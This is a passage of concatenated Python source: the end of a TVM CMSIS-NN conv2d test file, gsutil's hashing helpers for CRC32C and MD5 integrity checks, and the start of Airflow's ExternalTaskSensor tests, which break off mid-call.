    # Recycle the parametrized scales to get one scale per output channel.
    ks_len = len(kernel_scale)
    kernel_scale = [kernel_scale[i % ks_len] for i in range(out_channels)]
    output_scale, output_zero_point = get_conv2d_qnn_params(
        kernel_shape,
        input_scale,
        input_zero_point,
        kernel_scale,
        kernel_zero_point,
        dtype,
        dtype,
        dtype,
        True,
    )
    model, params = make_model(
        ifm_shape,
        kernel_shape,
        input_zero_point,
        input_scale,
        kernel_zero_point,
        kernel_scale,
        output_zero_point,
        output_scale,
        padding,
        strides,
        dilation,
        groups,
        dtype,
        dtype,
        out_channels,
        weight_format,
        enable_bias,
        relu_type,
    )
    orig_mod = make_module(model)
    cmsisnn_mod = cmsisnn.partition_for_cmsisnn(orig_mod, params)
    # validate pattern matching
    assert_partitioned_function(orig_mod, cmsisnn_mod)
    # validate the output
    rng = np.random.default_rng(12345)
    inputs = {"input": rng.integers(in_min, high=in_max, size=ifm_shape, dtype=dtype)}
    output_list = generate_ref_data(orig_mod["main"], inputs, params)
    compile_and_run(
        AOTTestModel(
            module=cmsisnn_mod,
            inputs=inputs,
            outputs=output_list,
            params=params,
            output_tolerance=1,
        ),
        test_runner,
        interface_api,
        use_unpacked_api,
    )
def parameterize_for_invalid_model(test):
    """Parametrize *test* with dtype / kernel-zero-point combinations that the
    CMSIS-NN partitioner must reject (everything except int8/int8 with zp 0)."""
    in_dtypes = ["uint8", "int8"]
    kernel_dtypes = ["uint8", "int8"]
    kernel_zero_points = [-33, 10, 0]
    invalid_combinations = [
        combo
        for combo in itertools.product(in_dtypes, kernel_dtypes, kernel_zero_points)
        if combo != ("int8", "int8", 0)
    ]
    return pytest.mark.parametrize(
        ["in_dtype", "kernel_dtype", "kernel_zero_point"],
        invalid_combinations,
    )(test)
@tvm.testing.requires_cmsisnn
@parameterize_for_invalid_model
def test_invalid_parameters(
    in_dtype,
    kernel_dtype,
    kernel_zero_point,
):
    """Unsupported dtype/zero-point combinations must NOT be offloaded:
    partitioning should leave no external CMSIS-NN function behind."""
    ifm_shape = (1, 28, 28, 12)
    out_channels = 2
    input_scale = 1
    input_zero_point = 24
    kernel_scale = [0.11, 0.0237]
    in_min, in_max = get_range_for_dtype_str(in_dtype)
    kernel_layout = "HWIO"
    kernel_shape = [3, 3, ifm_shape[3], out_channels]
    output_scale, output_zero_point = get_conv2d_qnn_params(
        kernel_shape,
        input_scale,
        input_zero_point,
        kernel_scale,
        kernel_zero_point,
        in_dtype,
        kernel_dtype,
        in_dtype,
        False,
    )
    model, params = make_model(
        shape=ifm_shape,
        kernel_shape=kernel_shape,
        input_zero_point=input_zero_point,
        input_scale=input_scale,
        kernel_zero_point=kernel_zero_point,
        kernel_scale=kernel_scale,
        output_zero_point=output_zero_point,
        output_scale=output_scale,
        padding="SAME",
        strides=(1, 1),
        dilation=(1, 1),
        groups=1,
        dtype=in_dtype,
        kernel_dtype=kernel_dtype,
        out_channels=out_channels,
        weight_format=kernel_layout,
        enable_bias=True,
        relu_type="NONE",
    )
    orig_mod = make_module(model)
    cmsisnn_mod = cmsisnn.partition_for_cmsisnn(orig_mod, params)
    # Nothing should have been partitioned out to CMSIS-NN.
    assert_no_external_function(cmsisnn_mod)
if __name__ == "__main__":
    # Allow running this test file directly; forward extra CLI args to pytest.
    sys.exit(pytest.main([__file__] + sys.argv[1:]))
|
|
# -*- coding: utf-8 -*-
# Copyright 2014 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Helper functions for hashing functionality."""
from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
from __future__ import unicode_literals
import base64
import binascii
import hashlib
import os
import six
from boto import config
import crcmod
from gslib.exception import CommandException
from gslib.utils.boto_util import UsingCrcmodExtension
from gslib.utils.constants import DEFAULT_FILE_BUFFER_SIZE
from gslib.utils.constants import MIN_SIZE_COMPUTE_LOGGING
from gslib.utils.constants import TRANSFER_BUFFER_SIZE
from gslib.utils.constants import UTF8
SLOW_CRCMOD_WARNING = """
WARNING: You have requested checksumming but your crcmod installation isn't
using the module's C extension, so checksumming will run very slowly. For help
installing the extension, please see "gsutil help crcmod".
"""
SLOW_CRCMOD_RSYNC_WARNING = """
WARNING: gsutil rsync uses hashes when modification time is not available at
both the source and destination. Your crcmod installation isn't using the
module's C extension, so checksumming will run very slowly. If this is your
first rsync since updating gsutil, this rsync can take significantly longer than
usual. For help installing the extension, please see "gsutil help crcmod".
"""
_SLOW_CRCMOD_DOWNLOAD_WARNING = """
WARNING: Downloading this composite object requires integrity checking with
CRC32c, but your crcmod installation isn't using the module's C extension,
so the hash computation will likely throttle download performance. For help
installing the extension, please see "gsutil help crcmod".
To disable slow integrity checking, see the "check_hashes" option in your
boto config file.
"""
_SLOW_CRC_EXCEPTION_TEXT = """
Downloading this composite object requires integrity checking with CRC32c,
but your crcmod installation isn't using the module's C extension, so the
hash computation will likely throttle download performance. For help
installing the extension, please see "gsutil help crcmod".
To download regardless of crcmod performance or to skip slow integrity
checks, see the "check_hashes" option in your boto config file.
NOTE: It is strongly recommended that you not disable integrity checks. Doing so
could allow data corruption to go undetected during uploading/downloading."""
_NO_HASH_CHECK_WARNING = """
WARNING: This download will not be validated since your crcmod installation
doesn't use the module's C extension, so the hash computation would likely
throttle download performance. For help in installing the extension, please
see "gsutil help crcmod".
To force integrity checking, see the "check_hashes" option in your boto config
file.
"""
# Configuration values for hashing.
CHECK_HASH_IF_FAST_ELSE_FAIL = 'if_fast_else_fail'
CHECK_HASH_IF_FAST_ELSE_SKIP = 'if_fast_else_skip'
CHECK_HASH_ALWAYS = 'always'
CHECK_HASH_NEVER = 'never'
# Table storing polynomial values of x^(2^k) mod CASTAGNOLI_POLY for all k < 31,
# where x^(2^k) and CASTAGNOLI_POLY are both considered polynomials. This is
# sufficient since x^(2^31) mod CASTAGNOLI_POLY = x.
X_POW_2K_TABLE = [
2, 4, 16, 256, 65536, 517762881, 984302966, 408362264, 1503875210,
2862076957, 3884826397, 1324787473, 621200174, 1758783527, 1416537776,
1180494764, 648569364, 2521473789, 994858823, 1728245375, 3498467999,
4059169852, 3345064394, 2828422810, 2429203150, 3336788029, 860151998,
2102628683, 1033187991, 4243778976, 1123580069
]
# Castagnoli polynomial and its degree.
CASTAGNOLI_POLY = 4812730177
DEGREE = 32
def ConcatCrc32c(crc_a, crc_b, num_bytes_in_b):
  """Computes CRC32C for concat(A, B) given crc(A), crc(B) and len(B).

  An explanation of the algorithm can be found at
  crcutil.googlecode.com/files/crc-doc.1.0.pdf.

  Args:
    crc_a: A 32-bit integer representing crc(A) with least-significant
           coefficient first.
    crc_b: Same as crc_a.
    num_bytes_in_b: Length of B in bytes.

  Returns:
    CRC32C for concat(A, B)
  """
  if not num_bytes_in_b:
    # B is empty, so crc(A + B) is simply crc(A).
    return crc_a
  # Shift crc(A) by len(B) bytes (multiply its polynomial by x^(8*len(B))),
  # then fold in crc(B).
  shifted_crc_a = _ExtendByZeros(crc_a, 8 * num_bytes_in_b)
  return shifted_crc_a ^ crc_b
def _CrcMultiply(p, q):
  """Multiplies two polynomials together modulo CASTAGNOLI_POLY.

  Args:
    p: The first polynomial.
    q: The second polynomial.

  Returns:
    Result of the multiplication.
  """
  # Carry-less schoolbook multiplication, reducing by CASTAGNOLI_POLY after
  # every doubling so intermediates never exceed DEGREE bits.
  product = 0
  overflow_bit = 1 << DEGREE
  for _ in range(DEGREE):
    if p & 1:
      product ^= q
    q <<= 1
    if q & overflow_bit:
      q ^= CASTAGNOLI_POLY
    p >>= 1
  return product
def _ExtendByZeros(crc, num_bits):
  """Given crc representing polynomial P(x), compute P(x)*x^num_bits.

  Args:
    crc: crc representing polynomial P(x).
    num_bits: number of zero bits to extend the polynomial by (the degree
        of the x^num_bits multiplier).

  Returns:
    P(x)*x^num_bits
  """

  def _ReverseBits32(crc):
    # Bit-reverse a 32-bit value: CRC32C is defined least-significant
    # coefficient first, while the table multiplication below is MSB-first.
    # (The pad width is part of the '032b' format spec; no extra args needed.)
    return int('{0:032b}'.format(crc)[::-1], 2)

  crc = _ReverseBits32(crc)
  i = 0
  # Square-and-multiply over the precomputed x^(2^k) table: consume one bit
  # of num_bits per iteration.
  while num_bits != 0:
    if num_bits & 1:
      crc = _CrcMultiply(crc, X_POW_2K_TABLE[i % len(X_POW_2K_TABLE)])
    i += 1
    num_bits >>= 1
  crc = _ReverseBits32(crc)
  return crc
def _CalculateHashFromContents(fp, hash_alg):
  """Calculates a hex digest of the contents of a seekable stream.

  This function resets the file pointer to position 0.

  Args:
    fp: An already-open file object.
    hash_alg: Instance of hashing class initialized to start state.

  Returns:
    Hash of the stream in hex string format.
  """
  # Reuse the multi-hash helper with a single-entry dict.
  hash_dict = {'placeholder': hash_alg}
  fp.seek(0)
  CalculateHashesFromContents(fp, hash_dict)
  fp.seek(0)
  return hash_dict['placeholder'].hexdigest()
def CalculateHashesFromContents(fp, hash_dict, callback_processor=None):
  """Calculates hashes of the contents of a file.

  Args:
    fp: An already-open file object (stream will be consumed).
    hash_dict: Dict of (string alg_name: initialized hashing class)
        Hashing class will be populated with digests upon return.
    callback_processor: Optional callback processing class that implements
        Progress(integer amount of bytes processed).
  """
  while True:
    chunk = fp.read(DEFAULT_FILE_BUFFER_SIZE)
    if not chunk:
      break
    # Text-mode streams on Python 3 yield str; digesters need bytes.
    if six.PY3 and isinstance(chunk, str):
      chunk = chunk.encode(UTF8)
    for digester in six.itervalues(hash_dict):
      digester.update(chunk)
    if callback_processor:
      callback_processor.Progress(len(chunk))
def CalculateB64EncodedCrc32cFromContents(fp):
  """Calculates a base64 CRC32c checksum of the contents of a seekable stream.

  This function sets the stream position 0 before and after calculation.

  Args:
    fp: An already-open file object.

  Returns:
    CRC32c checksum of the file in base64 format.
  """
  # Delegates to the generic helper with a fresh crcmod CRC32C digester.
  return _CalculateB64EncodedHashFromContents(fp,
                                              crcmod.predefined.Crc('crc-32c'))
def CalculateB64EncodedMd5FromContents(fp):
  """Calculates a base64 MD5 digest of the contents of a seekable stream.

  This function sets the stream position 0 before and after calculation.

  Args:
    fp: An already-open file object.

  Returns:
    MD5 digest of the file in base64 format.
  """
  # GetMd5 handles FIPS-restricted platforms transparently.
  return _CalculateB64EncodedHashFromContents(fp, GetMd5())
def CalculateMd5FromContents(fp):
  """Calculates a hex MD5 digest of the contents of a seekable stream.

  This function sets the stream position 0 before and after calculation.

  Args:
    fp: An already-open file object.

  Returns:
    MD5 digest of the file in hex format.
  """
  return _CalculateHashFromContents(fp, GetMd5())
def Base64EncodeHash(digest_value):
  """Returns the base64-encoded version of the input hex digest value."""
  raw_digest = binascii.unhexlify(digest_value)
  b64_digest = base64.b64encode(raw_digest)
  # Strip any trailing newline and return text, not bytes.
  return b64_digest.rstrip(b'\n').decode(UTF8)
def Base64ToHexHash(base64_hash):
  """Returns the hex digest value of the input base64-encoded hash.

  Args:
    base64_hash: Base64-encoded hash, which may contain newlines and single or
        double quotes.

  Returns:
    Hex digest of the input argument.
  """
  # Drop surrounding quotes/newlines before decoding.
  stripped = base64_hash.strip('\n"\'')
  decoded_bytes = base64.b64decode(stripped.encode(UTF8))
  return binascii.hexlify(decoded_bytes)
def _CalculateB64EncodedHashFromContents(fp, hash_alg):
  """Calculates a base64 digest of the contents of a seekable stream.

  This function sets the stream position 0 before and after calculation.

  Args:
    fp: An already-open file object.
    hash_alg: Instance of hashing class initialized to start state.

  Returns:
    Hash of the stream in base64 format.
  """
  # Compute the hex digest, then re-encode it as base64.
  return Base64EncodeHash(_CalculateHashFromContents(fp, hash_alg))
def GetUploadHashAlgs():
  """Returns a dict of hash algorithms for validating an uploaded object.

  This is for use only with single object uploads, not compose operations
  such as those used by parallel composite uploads (though it can be used to
  validate the individual components).

  Returns:
    dict of (algorithm_name: hash_algorithm)
  """
  check_hashes_config = config.get('GSUtil', 'check_hashes',
                                   CHECK_HASH_IF_FAST_ELSE_FAIL)
  # Use the module constant (not a bare string) for consistency with
  # GetDownloadHashAlgs.
  if check_hashes_config == CHECK_HASH_NEVER:
    return {}
  return {'md5': GetMd5}
def GetDownloadHashAlgs(logger, consider_md5=False, consider_crc32c=False):
  """Returns a dict of hash algorithms for validating an object.

  Args:
    logger: logging.Logger for outputting log messages.
    consider_md5: If True, consider using a md5 hash.
    consider_crc32c: If True, consider using a crc32c hash.

  Returns:
    Dict of (string, hash algorithm).

  Raises:
    CommandException if hash algorithms satisfying the boto config file
    cannot be returned.
  """
  check_hashes_config = config.get('GSUtil', 'check_hashes',
                                   CHECK_HASH_IF_FAST_ELSE_FAIL)
  if check_hashes_config == CHECK_HASH_NEVER:
    return {}

  hash_algs = {}
  if consider_md5:
    hash_algs['md5'] = GetMd5
  elif consider_crc32c:
    # If the cloud provider supplies a CRC, we'll compute a checksum to
    # validate if we're using a native crcmod installation and MD5 isn't
    # offered as an alternative.
    if UsingCrcmodExtension():
      hash_algs['crc32c'] = lambda: crcmod.predefined.Crc('crc-32c')
    elif not hash_algs:
      if check_hashes_config == CHECK_HASH_IF_FAST_ELSE_FAIL:
        raise CommandException(_SLOW_CRC_EXCEPTION_TEXT)
      elif check_hashes_config == CHECK_HASH_IF_FAST_ELSE_SKIP:
        # Logger.warn is a deprecated alias of Logger.warning; use warning().
        logger.warning(_NO_HASH_CHECK_WARNING)
      elif check_hashes_config == CHECK_HASH_ALWAYS:
        logger.warning(_SLOW_CRCMOD_DOWNLOAD_WARNING)
        hash_algs['crc32c'] = lambda: crcmod.predefined.Crc('crc-32c')
      else:
        raise CommandException(
            'Your boto config \'check_hashes\' option is misconfigured.')
  return hash_algs
def GetMd5(byte_string=b''):
  """Returns an md5 hash object, avoiding FIPS errors on Red Hat systems.

  On FIPS-enabled Red Hat platforms a plain hashlib.md5() call can raise
  ValueError; in that case we retry with usedforsecurity=False, which is
  acceptable because the digest is used only for integrity checking.

  Examples: GetMd5(b'abc')
            GetMd5(bytes('abc', encoding='utf-8'))

  Args:
    byte_string (bytes): String in bytes form to hash. Don't include for empty
        hash object, since md5(b'').digest() == md5().digest().

  Returns:
    md5 hash object.
  """
  try:
    md5_hash = hashlib.md5(byte_string)
  except ValueError:
    # "usedforsecurity" flag only available on Red Hat systems or Python 3.9+.
    # pylint:disable=unexpected-keyword-arg
    md5_hash = hashlib.md5(byte_string, usedforsecurity=False)
    # pylint:enable=unexpected-keyword-arg
  return md5_hash
class HashingFileUploadWrapper(object):
  """Wraps an input stream in a hash digester and exposes a stream interface.

  This class provides integrity checking during file uploads via the
  following properties:

  Calls to read will appropriately update digesters with all bytes read.

  Calls to seek (assuming it is supported by the wrapped stream) using
  os.SEEK_SET will catch up / reset the digesters to the specified
  position. If seek is called with a different os.SEEK mode, the caller
  must return to the original position using os.SEEK_SET before further
  reads.

  Calls to seek are fast if the desired position is equal to the position at
  the beginning of the last read call (we only need to re-hash bytes
  from that point on).
  """

  def __init__(self, stream, digesters, hash_algs, src_url, logger):
    """Initializes the wrapper.

    Args:
      stream: Input stream.
      digesters: dict of {string: hash digester} containing digesters, where
          string is the name of the hash algorithm.
      hash_algs: dict of {string: hash algorithm} for resetting and
          recalculating digesters. String is the name of the hash algorithm.
      src_url: Source FileUrl that is being copied.
      logger: For outputting log messages.
    """
    if not digesters:
      raise CommandException('HashingFileUploadWrapper used with no digesters.')
    elif not hash_algs:
      raise CommandException('HashingFileUploadWrapper used with no hash_algs.')
    self._orig_fp = stream
    self._digesters = digesters
    self._src_url = src_url
    self._logger = logger
    # Absolute stream offset of the last non-SEEK_SET seek, or None when the
    # digesters match the stream position and read() is safe to call.
    self._seek_away = None
    # Snapshot of each digester taken at the start of the most recent read()
    # (the "previous mark"), so seeking back to that offset is cheap.
    self._digesters_previous = {}
    for alg in self._digesters:
      self._digesters_previous[alg] = self._digesters[alg].copy()
    # Stream offsets corresponding to the snapshot digesters and to the live
    # digesters, respectively.
    self._digesters_previous_mark = 0
    self._digesters_current_mark = 0
    self._hash_algs = hash_algs

  @property
  def mode(self):
    """Returns the mode of the underlying file descriptor, or None."""
    return getattr(self._orig_fp, 'mode', None)

  def read(self, size=-1):  # pylint: disable=invalid-name
    """Reads from the wrapped file pointer and calculates hash digests.

    Args:
      size: The amount of bytes to read. If omitted or negative, the entire
          contents of the file will be read, hashed, and returned.

    Returns:
      Bytes from the wrapped stream.

    Raises:
      CommandException if the position of the wrapped stream is unknown.
    """
    if self._seek_away is not None:
      raise CommandException('Read called on hashing file pointer in an '
                             'unknown position; cannot correctly compute '
                             'digest.')
    data = self._orig_fp.read(size)
    if isinstance(data, six.text_type):
      data = data.encode(UTF8)
    # Snapshot the digesters before updating them so a subsequent seek back
    # to this position does not require re-hashing from offset 0.
    self._digesters_previous_mark = self._digesters_current_mark
    for alg in self._digesters:
      self._digesters_previous[alg] = self._digesters[alg].copy()
      self._digesters[alg].update(data)
    self._digesters_current_mark += len(data)
    return data

  def tell(self):  # pylint: disable=invalid-name
    """Returns the current stream position."""
    return self._orig_fp.tell()

  def seekable(self):  # pylint: disable=invalid-name
    """Returns true if the stream is seekable."""
    return self._orig_fp.seekable()

  def seek(self, offset, whence=os.SEEK_SET):  # pylint: disable=invalid-name
    """Seeks in the wrapped file pointer and catches up hash digests.

    Args:
      offset: The offset to seek to.
      whence: os.SEEK_CUR, or SEEK_END, SEEK_SET.

    Returns:
      Return value from the wrapped stream's seek call.
    """
    if whence != os.SEEK_SET:
      # We do not catch up hashes for non-absolute seeks, and rely on the
      # caller to seek to an absolute position before reading.
      self._seek_away = self._orig_fp.tell()
    else:
      # Hashes will be correct and it's safe to call read().
      self._seek_away = None
      if offset < self._digesters_previous_mark:
        # This is earlier than our earliest saved digest, so we need to
        # reset the digesters and scan from the beginning.
        for alg in self._digesters:
          self._digesters[alg] = self._hash_algs[alg]()
        self._digesters_current_mark = 0
        self._orig_fp.seek(0)
        self._CatchUp(offset)
      elif offset == self._digesters_previous_mark:
        # Just load the saved digests.
        self._digesters_current_mark = self._digesters_previous_mark
        for alg in self._digesters:
          self._digesters[alg] = self._digesters_previous[alg]
      elif offset < self._digesters_current_mark:
        # Reset the position to our previous digest and scan forward.
        self._digesters_current_mark = self._digesters_previous_mark
        for alg in self._digesters:
          self._digesters[alg] = self._digesters_previous[alg]
        self._orig_fp.seek(self._digesters_previous_mark)
        self._CatchUp(offset - self._digesters_previous_mark)
      else:
        # Scan forward from our current digest and position.
        self._orig_fp.seek(self._digesters_current_mark)
        self._CatchUp(offset - self._digesters_current_mark)
    return self._orig_fp.seek(offset, whence)

  def _CatchUp(self, bytes_to_read):
    """Catches up hashes, but does not return data and uses little memory.

    Before calling this function, digesters_current_mark should be updated
    to the current location of the original stream and the self._digesters
    should be current to that point (but no further).

    Args:
      bytes_to_read: Number of bytes to catch up from the original stream.
    """
    if self._orig_fp.tell() != self._digesters_current_mark:
      raise CommandException(
          'Invalid mark when catching up hashes. Stream position %s, hash '
          'position %s' % (self._orig_fp.tell(), self._digesters_current_mark))
    for alg in self._digesters:
      if bytes_to_read >= MIN_SIZE_COMPUTE_LOGGING:
        # Catching up can take a while for large files; let the user know.
        self._logger.debug('Catching up %s for %s...', alg,
                           self._src_url.url_string)
      self._digesters_previous[alg] = self._digesters[alg].copy()
    self._digesters_previous_mark = self._digesters_current_mark
    # Hash the skipped-over region in fixed-size chunks to bound memory use.
    bytes_remaining = bytes_to_read
    bytes_this_round = min(bytes_remaining, TRANSFER_BUFFER_SIZE)
    while bytes_this_round:
      data = self._orig_fp.read(bytes_this_round)
      if isinstance(data, six.text_type):
        data = data.encode(UTF8)
      bytes_remaining -= bytes_this_round
      for alg in self._digesters:
        self._digesters[alg].update(data)
      bytes_this_round = min(bytes_remaining, TRANSFER_BUFFER_SIZE)
    self._digesters_current_mark += bytes_to_read
|
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import logging
import unittest
from datetime import time, timedelta
import pytest
from airflow import exceptions, settings
from airflow.exceptions import AirflowException, AirflowSensorTimeout
from airflow.models import DagBag, DagRun, TaskInstance
from airflow.models.dag import DAG
from airflow.operators.bash import BashOperator
from airflow.operators.dummy import DummyOperator
from airflow.sensors.external_task import ExternalTaskMarker, ExternalTaskSensor
from airflow.sensors.time_sensor import TimeSensor
from airflow.serialization.serialized_objects import SerializedBaseOperator
from airflow.utils.session import provide_session
from airflow.utils.state import DagRunState, State, TaskInstanceState
from airflow.utils.timezone import datetime
from airflow.utils.types import DagRunType
from tests.test_utils.db import clear_db_runs
# Logical date shared by every test in this module.
DEFAULT_DATE = datetime(2015, 1, 1)
# DAG/task ids that the ExternalTaskSensor tests below poke for.
TEST_DAG_ID = 'unit_test_dag'
TEST_TASK_ID = 'time_sensor_check'
TEST_TASK_ID_ALTERNATE = 'time_sensor_check_alternate'
# Dag folder containing no DAG files, so DagBag loads only what we bag manually
# (plus examples where include_examples=True is passed).
DEV_NULL = '/dev/null'
@pytest.fixture(autouse=True)
def clean_db():
    """Automatically wipe all DagRun rows before each test in this module."""
    clear_db_runs()
class TestExternalTaskSensor(unittest.TestCase):
    """Tests for ExternalTaskSensor poking tasks/DAGs in another DAG."""

    def setUp(self):
        # include_examples=True: some tests below reference the bundled
        # "example_bash_operator" example DAG.
        self.dagbag = DagBag(dag_folder=DEV_NULL, include_examples=True)
        self.args = {'owner': 'airflow', 'start_date': DEFAULT_DATE}
        self.dag = DAG(TEST_DAG_ID, default_args=self.args)

    def test_time_sensor(self, task_id=TEST_TASK_ID):
        """Run a TimeSensor for DEFAULT_DATE.

        Doubles as a helper: other tests call this to seed a successful task
        instance for the ExternalTaskSensor under test to find.
        """
        op = TimeSensor(task_id=task_id, target_time=time(0), dag=self.dag)
        op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)

    def test_external_task_sensor(self):
        """Sensor succeeds when the external task instance succeeded."""
        self.test_time_sensor()
        op = ExternalTaskSensor(
            task_id='test_external_task_sensor_check',
            external_dag_id=TEST_DAG_ID,
            external_task_id=TEST_TASK_ID,
            dag=self.dag,
        )
        op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)

    def test_external_task_sensor_multiple_task_ids(self):
        """Sensor can wait on several external task ids at once."""
        self.test_time_sensor(task_id=TEST_TASK_ID)
        self.test_time_sensor(task_id=TEST_TASK_ID_ALTERNATE)
        op = ExternalTaskSensor(
            task_id='test_external_task_sensor_check_task_ids',
            external_dag_id=TEST_DAG_ID,
            external_task_ids=[TEST_TASK_ID, TEST_TASK_ID_ALTERNATE],
            dag=self.dag,
        )
        op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)

    def test_catch_overlap_allowed_failed_state(self):
        """A state may not appear in both allowed_states and failed_states."""
        with pytest.raises(AirflowException):
            ExternalTaskSensor(
                task_id='test_external_task_sensor_check',
                external_dag_id=TEST_DAG_ID,
                external_task_id=TEST_TASK_ID,
                allowed_states=[State.SUCCESS],
                failed_states=[State.SUCCESS],
                dag=self.dag,
            )

    def test_external_task_sensor_wrong_failed_states(self):
        """failed_states entries must be valid task states."""
        with pytest.raises(ValueError):
            ExternalTaskSensor(
                task_id='test_external_task_sensor_check',
                external_dag_id=TEST_DAG_ID,
                external_task_id=TEST_TASK_ID,
                failed_states=["invalid_state"],
                dag=self.dag,
            )

    def test_external_task_sensor_failed_states(self):
        """Sensor succeeds when the external task is not in failed_states."""
        self.test_time_sensor()
        op = ExternalTaskSensor(
            task_id='test_external_task_sensor_check',
            external_dag_id=TEST_DAG_ID,
            external_task_id=TEST_TASK_ID,
            failed_states=["failed"],
            dag=self.dag,
        )
        op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)

    def test_external_task_sensor_failed_states_as_success(self):
        """Sensor raises when the external task lands in failed_states."""
        self.test_time_sensor()
        op = ExternalTaskSensor(
            task_id='test_external_task_sensor_check',
            external_dag_id=TEST_DAG_ID,
            external_task_id=TEST_TASK_ID,
            allowed_states=["failed"],
            failed_states=["success"],
            dag=self.dag,
        )
        with self.assertLogs(op.log, level=logging.INFO) as cm:
            with pytest.raises(AirflowException) as ctx:
                op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
            # The sensor must log what it is poking for, then fail with a
            # message naming the failed external tasks.
            assert (
                'INFO:airflow.task.operators:Poking for tasks [\'time_sensor_check\']'
                ' in dag unit_test_dag on %s ... ' % DEFAULT_DATE.isoformat() in cm.output
            )
            assert (
                str(ctx.value) == "Some of the external tasks "
                "['time_sensor_check'] in DAG "
                "unit_test_dag failed."
            )

    def test_external_task_sensor_failed_states_as_success_mulitple_task_ids(self):
        """Same as the single-task case above, but with multiple task ids."""
        self.test_time_sensor(task_id=TEST_TASK_ID)
        self.test_time_sensor(task_id=TEST_TASK_ID_ALTERNATE)
        op = ExternalTaskSensor(
            task_id='test_external_task_sensor_check_task_ids',
            external_dag_id=TEST_DAG_ID,
            external_task_ids=[TEST_TASK_ID, TEST_TASK_ID_ALTERNATE],
            allowed_states=["failed"],
            failed_states=["success"],
            dag=self.dag,
        )
        with self.assertLogs(op.log, level=logging.INFO) as cm:
            with pytest.raises(AirflowException) as ctx:
                op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
            assert (
                'INFO:airflow.task.operators:Poking for tasks '
                '[\'time_sensor_check\', \'time_sensor_check_alternate\'] '
                'in dag unit_test_dag on %s ... ' % DEFAULT_DATE.isoformat() in cm.output
            )
            assert (
                str(ctx.value) == "Some of the external tasks "
                "['time_sensor_check', 'time_sensor_check_alternate'] in DAG "
                "unit_test_dag failed."
            )

    def test_external_dag_sensor(self):
        """With external_task_id=None the sensor waits on the whole DagRun."""
        other_dag = DAG('other_dag', default_args=self.args, end_date=DEFAULT_DATE, schedule_interval='@once')
        other_dag.create_dagrun(
            run_id='test', start_date=DEFAULT_DATE, execution_date=DEFAULT_DATE, state=State.SUCCESS
        )
        op = ExternalTaskSensor(
            task_id='test_external_dag_sensor_check',
            external_dag_id='other_dag',
            external_task_id=None,
            dag=self.dag,
        )
        op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)

    def test_external_task_sensor_fn_multiple_execution_dates(self):
        """execution_date_fn returning several dates: all must be successful."""
        # Bash task that fails only on the first second of each minute, which
        # makes the DEFAULT_DATE + 1s run the failing one.
        bash_command_code = """
{% set s=logical_date.time().second %}
echo "second is {{ s }}"
if [[ $(( {{ s }} % 60 )) == 1 ]]
then
    exit 1
fi
exit 0
"""
        dag_external_id = TEST_DAG_ID + '_external'
        dag_external = DAG(dag_external_id, default_args=self.args, schedule_interval=timedelta(seconds=1))
        task_external_with_failure = BashOperator(
            task_id="task_external_with_failure", bash_command=bash_command_code, retries=0, dag=dag_external
        )
        task_external_without_failure = DummyOperator(
            task_id="task_external_without_failure", retries=0, dag=dag_external
        )
        task_external_without_failure.run(
            start_date=DEFAULT_DATE, end_date=DEFAULT_DATE + timedelta(seconds=1), ignore_ti_state=True
        )
        session = settings.Session()
        TI = TaskInstance
        try:
            task_external_with_failure.run(
                start_date=DEFAULT_DATE, end_date=DEFAULT_DATE + timedelta(seconds=1), ignore_ti_state=True
            )
            # The test_with_failure task is expected to fail
            # once per minute (the run on the first second of
            # each minute).
        except Exception as e:
            failed_tis = (
                session.query(TI)
                .filter(
                    TI.dag_id == dag_external_id,
                    TI.state == State.FAILED,
                    TI.execution_date == DEFAULT_DATE + timedelta(seconds=1),
                )
                .all()
            )
            # Swallow only the one failure we deliberately provoked;
            # re-raise anything else.
            if len(failed_tis) == 1 and failed_tis[0].task_id == 'task_external_with_failure':
                pass
            else:
                raise e
        dag_id = TEST_DAG_ID
        dag = DAG(dag_id, default_args=self.args, schedule_interval=timedelta(minutes=1))
        task_without_failure = ExternalTaskSensor(
            task_id='task_without_failure',
            external_dag_id=dag_external_id,
            external_task_id='task_external_without_failure',
            execution_date_fn=lambda dt: [dt + timedelta(seconds=i) for i in range(2)],
            allowed_states=['success'],
            retries=0,
            timeout=1,
            poke_interval=1,
            dag=dag,
        )
        task_with_failure = ExternalTaskSensor(
            task_id='task_with_failure',
            external_dag_id=dag_external_id,
            external_task_id='task_external_with_failure',
            execution_date_fn=lambda dt: [dt + timedelta(seconds=i) for i in range(2)],
            allowed_states=['success'],
            retries=0,
            timeout=1,
            poke_interval=1,
            dag=dag,
        )
        task_without_failure.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
        # One of the two poked execution dates failed, so the sensor never
        # succeeds and times out.
        with pytest.raises(AirflowSensorTimeout):
            task_with_failure.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)

    def test_external_task_sensor_delta(self):
        """execution_delta shifts the execution date the sensor looks at."""
        self.test_time_sensor()
        op = ExternalTaskSensor(
            task_id='test_external_task_sensor_check_delta',
            external_dag_id=TEST_DAG_ID,
            external_task_id=TEST_TASK_ID,
